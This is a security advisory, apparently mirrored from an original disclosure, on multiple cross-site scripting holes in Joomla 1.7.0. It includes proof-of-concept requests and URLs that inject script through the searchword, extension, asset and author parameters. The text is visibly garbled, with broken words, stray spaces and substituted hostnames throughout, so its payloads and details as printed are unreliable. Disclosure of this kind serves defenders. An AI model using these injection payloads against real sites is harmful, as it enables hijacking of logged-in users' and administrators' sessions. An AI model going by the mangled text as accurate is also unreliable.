Joomla! 1.7.0 Multiple xss and repair

 

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

 

1. Overview

 

Joomla! 1.7.0 (stable version) contains multiple xss

 

2. Background

 

Joomla is a free and open source content management system (CMS)

Publishing content on the World Wide Web and intranets. It comprises

Controller (MVC) Web application framework that can also be

Used independently.

Joomla is written in PHP, uses object-oriented programming (OOP)

Techniques and software design patterns, stores data in a MySQL

Database, and includes features such as page caching, RSS feeds,

Printable versions of pages, news flashes, blogs, polls, search, and

Support for language internationalization.

 

3. defect description

 

Several parameters (searchword, extension, asset, author) in Joomla!

Core components are not properly sanitized upon submission to

/Index. php url, which allows attacker to conduct Cross Site Scripting

Attack. This may allow an attacker to create a specially crafted URL

That wocould execute arbitrary script code in a victim's browser.

 

4. Affected Versions: <= 1.7.0

 

5. PROOF-OF-CONCEPT/EXPLOIT

 

Component: com_search, parameter: searchword (Browser: IE, Konqueror)

========================================================== ==================================

 

[REQUEST]

POST/joomla17_noseo/index. php http/ 1.1

Host: www.2cto.com

Accept :*/*

Accept-Language: en

User-Agent: MSIE 8.0

Connection: close

Http://www.bkjia.com/joomla17_noseo

Content-Type: application/x-www-form-urlencoded

Content-Length: 456

 

Task = search & Itemid = 435 & searchword = search'; onunload = function () {x = confirm (

String. fromCharCode (89,111,117, 39,118,101, 32,103,111,116, 32,109, 10

1,115,115, 97,103,101, 32,102,114,111,109, 100,109,105,110,105,115, 11

6,114, 97,116,111,114, 68,111, 32,121,111,117, 32,119, 97,110,116

6,111, 32,103,111, 32,116,111, 111,120, 63); alert (String. fromC

HarCode (89,111,117, 39,118,101, 32,103,111,116, 33) ;}; // xsssss

Ssssss & option = com_search

[/REQUEST]

 

++ ++

 

User Login is required to execute the following XSSes.

 

Parameter: extension, Component: com_categories

========================================================== ================

 

Http://www.bkjia.com/joomla17_noseo/administrator/index. php? Option = com_categ

Ories & extension = com_content % 20% 22 onmouseover = % 22 alert % 28/XSS/% 29% 22 style

= % 22 width: 3000px! Important; height: 3000px! Important; z-index: 999999; positi

On: absolute! Important; left: 0; top: 0; % 22% 20x = % 22

 

Parameter: asset, Component: com_media

========================================================== ================

 

Http://www.bkjia.com/joomla17_noseo/administrator/index. php? Option = com_media

& View = images & tmpl = component & e_name = jform_articletext & asset = 1% 22% 20 onmous

Eover = % 22 alert % 28/XSS/% 29% 22 style = % 22 width: 3000px! Important; height: 3000 p

X! Important; z-index: 999999; position: absolute! Important; left: 0; top: 0; % 22x

= % 22 & author =

 

Parameter: author, Component: com_media

========================================================== ================

 

Http://www.bkjia.com/joomla17_noseo/administrator/index. php? Option = com_media

& View = images & tmpl = component & e_name = jform_articletext & asset = & author = 1% 22%

20 onmouseover = % 22 alert % 28/XSS/% 29% 22 style = % 22 width: 3000px! Important; heig

Ht: 3000px! Important; z-index: 999999; position: absolute! Important; left: 0;

P: 0; % 22x = % 22

 

++ ++

 

6. IMPACT

 

Attackers can compromise currently logged-in user/administrator

Session and impersonate arbitrary user actions available under

/Administrator/functions.

 

7. Solutions

 

Upgrade to a later version.

 

8. VENDOR

 

Joomla! Developer Team

Http://www.joomla.org

 

# Yehg []